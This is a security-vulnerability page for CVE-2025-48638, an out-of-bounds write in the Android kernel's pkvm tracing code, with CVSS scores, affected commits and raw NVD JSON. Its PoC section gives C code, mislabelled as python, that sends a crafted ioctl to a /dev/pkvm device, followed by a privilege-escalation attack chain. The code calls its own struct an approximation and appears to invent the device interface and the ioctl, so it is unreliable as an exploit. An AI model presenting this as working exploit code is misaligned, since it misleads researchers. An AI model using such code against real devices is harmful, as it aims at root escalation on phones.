Security Vulnerability Report
中文
CVE-2025-48638 CVSS 7.8 HIGH

CVE-2025-48638

Published: 2025-12-08 17:16:20
Last Modified: 2025-12-08 20:15:52
Source: [email protected]

Description

In __pkvm_load_tracing of trace.c, there is a possible out-of-bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android Kernel common < 2025-12-01 security patch
Android kernel/common branch before commit 0429b7af308cf65c84109c08d06b01950dcd57fe
Android kernel/common branch before commit 96ebe96170d67df5072afa2ce84622f5a0ff552a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48638 PoC - Android pkvm trace out-of-bounds write // This PoC demonstrates the vulnerability in __pkvm_load_tracing #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // Kernel structure for pkvm tracing (approximation) struct pkvm_trace_args { unsigned long buffer_addr; unsigned long buffer_size; unsigned long trace_mask; char *user_buffer; }; #define PKVM_TRACE_SETUP _IOW('p', 1, struct pkvm_trace_args) int main(int argc, char *argv[]) { int fd; struct pkvm_trace_args args; printf("CVE-2025-48638 PoC - pkvm trace OOB write\n"); printf("Target: Android kernel < 5.15 with pkvm enabled\n\n"); // Open pkvm device (if accessible) fd = open("/dev/pkvm", O_RDWR); if (fd < 0) { printf("[!] Cannot open /dev/pkvm - may require root or specific kernel config\n"); printf("[!] This vulnerability requires local access with low privileges\n"); return 1; } // Prepare malicious input to trigger OOB write // The vulnerability is in improper input validation in __pkvm_load_tracing args.buffer_addr = 0x1000; // Arbitrary address args.buffer_size = 0x100; // Small buffer args.trace_mask = 0xFFFFFFFF; // Full trace mask args.user_buffer = malloc(0x200); memset(args.user_buffer, 0x41, 0x200); printf("[*] Sending malicious trace request...\n"); printf("[*] Buffer size: 0x%lx\n", args.buffer_size); printf("[*] Trace mask: 0x%lx\n", args.trace_mask); // Trigger the vulnerable code path long result = ioctl(fd, PKVM_TRACE_SETUP, &args); if (result < 0) { printf("[+] ioctl returned error - vulnerability may be present\n"); printf("[+] Check dmesg for kernel oops or memory corruption\n"); } else { printf("[*] Request processed, monitor for privilege escalation\n"); } close(fd); free(args.user_buffer); return 0; } /* * Attack Chain: * 1. Attacker with local low-privilege access * 2. Open pkvm device interface * 3. Send crafted ioctl request with invalid buffer parameters * 4. Trigger __pkvm_load_tracing with improper validation * 5. Achieve out-of-bounds write in kernel memory * 6. Overwrite critical kernel structures * 7. Escalate privileges to root/admin level */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48638", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:19.847", "lastModified": "2025-12-08T20:15:51.997", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In __pkvm_load_tracing of trace.c, there is a possible out-of-bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://android.googlesource.com/kernel/common/+/0429b7af308cf65c84109c08d06b01950dcd57fe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://android.googlesource.com/kernel/common/+/96ebe96170d67df5072afa2ce84622f5a0ff552a", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.